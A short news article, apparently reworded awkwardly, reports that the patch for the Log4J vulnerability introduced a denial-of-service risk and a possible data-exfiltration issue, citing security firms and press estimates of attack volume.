Software fix for ‘worst vulnerability in decade’ contains exploits — Analysis
Two new methods for malicious actors, at most, have been introduced by the patch to fix a critical flaw in popular software.
Global headlines were made last week by the revelation of an exploit in Log4J. This open-source tool was developed by Apache Software Foundation. Servers that used the Log4J logging utility were able to run any code.
Although this loophole was fixed by a patch released last week, new vulnerabilities were introduced, detailed by ZDNet as well by Ars Technica.
According to developers, the fix is “incomplete in certain non-default configurations”Attackers had the chance to launch denials-of-service attacks which make a service unavailable. The risk can be reduced by deactivating certain functions.
Praetorian cybersecurity company reported another problem on Wednesday. They said that they had fixed the issue. “can still allow for exfiltration of sensitive data in certain circumstances.”
A newer version of the tool has been released this week. Companies will need to wait for this upgrade before they can integrate it into their products.
Malicious actors are actively exploiting the original 0-day vulnerability. The Financial Times estimates that more than 1.2 Million attacks have been made since Friday using the Log4J flaw.
This utility was written in Java. Java is a widely used programming language in many modern products. “single biggest, most critical vulnerability of the last decade”Tenable, a security firm.